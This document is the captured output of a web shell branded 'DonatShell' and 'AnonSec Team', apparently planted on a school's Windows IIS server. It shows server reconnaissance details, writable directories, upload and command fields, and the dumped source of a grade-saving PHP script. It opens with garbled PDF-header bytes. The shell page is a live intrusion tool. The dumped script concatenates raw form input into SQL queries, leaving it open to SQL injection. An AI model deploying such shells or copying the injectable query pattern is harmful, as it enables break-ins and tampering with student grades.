%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/mis/teacher/subject_score_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/mis/teacher/subject_score_v2/SaveGrade.php
<?PHP
session_start();
// print_r($_POST);
// exit();
include("conf.php");
$YMDRecode =  "3|".$_SESSION["IDTeacher"]."@".date("Ymd#Hms");
$LogFileName = $_SESSION['AYear'].'-'.$_SESSION["Term"].'-'.$_SESSION["IDTeacher"].'-'.iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) .'-'.iconv('utf-8', 'tis-620', $_SESSION["PClass"]) .'-'.$_SESSION["PRoom"].' (Grade).txt';
for ($i = 1; $i <= count($_POST['IDStudent']); $i++) {
	if ($_SESSION["PClass"] != "") {
		$sql = "update TScore set P100='". $_POST['Score'][$i] ."' , PGrade='" . $_POST['Grade'][$i] . "' , PGradeForCal = " . $_POST['Grade'][$i] . ",YMDRecord='".$YMDRecode."' where   Regyear='" . $_SESSION["AYear"] . "' and (RegTerm='" . $_SESSION["Term"] . "' or RegTerm='_') and PSubjectCode='" . iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) . "' and PClass='" . iconv('utf-8', 'tis-620', $_SESSION["PClass"]) . "' and PRoom='" . $_SESSION["PRoom"] . "' and  IDTeacher='" . $_SESSION["IDTeacher"] . "' and IDStudent='" . $_POST['IDStudent'][$i] . "' and isnull(PGrade,'') =''";
	} else {
		$sql = "update TScore set P100='". $_POST['Score'][$i] ."' , PGrade='" . $_POST['Grade'][$i] . "' ,PGradeForCal = " . $_POST['Grade'][$i] . ",YMDRecord='".$YMDRecode."' where   Regyear='" . $_SESSION["AYear"] . "' and (RegTerm='" . $_SESSION["Term"] . "' or RegTerm='_') and PSubjectCode='" . iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) . "' and  IDTeacher='" . $_SESSION["IDTeacher"] . "' and IDStudent='" . $_POST['IDStudent'][$i] . "' and isnull(PGrade,'') =''";
	}
	file_put_contents('./log/'.$LogFileName, date('Y-m-d H:i:s').': '.$sql. PHP_EOL, FILE_APPEND);
	// echo $sql . "<BR>";
	// exit();
	$stmt = sqlsrv_query($conn, $sql);
	if ($stmt === false) {
		echo "<h3 class='text-danger'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</h2>";
		exit();
		break;
	} else {
		$sql = "insert into Log_SendGrade(RegYear, RegTerm, PSubjectCode,IDStudent,Score, Grade, DateTime, UserSend) values ('" . $_SESSION["AYear"] . "','" . $_SESSION["Term"] . "','" . iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) . "','" . $_POST['IDStudent'][$i] . "',(select P100 from TScore where IDStudent='" . $_POST['IDStudent'][$i] . "' and PSubjectCode='" . iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) . "' and RegYear='" . $_SESSION["AYear"] . "' and (RegTerm='" . $_SESSION["Term"] . "' or RegTerm='_')),'" . $_POST['Grade'][$i] . "',getdate(),'" . $_SESSION["IDTeacher"] . "')";
		$stmt = sqlsrv_query($conn, $sql);
		if ($stmt === false) {
			echo "<h3 class='text-danger'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้ (log SendGrade)</h2>";
			exit();
			break;
		}
	}
}
echo "<h3 class='text-success'>ประมวลผล ผลการเรียนเสร็จสมบูรณ์...</h2>";
exit();

Anon7 - 2022
AnonSec Team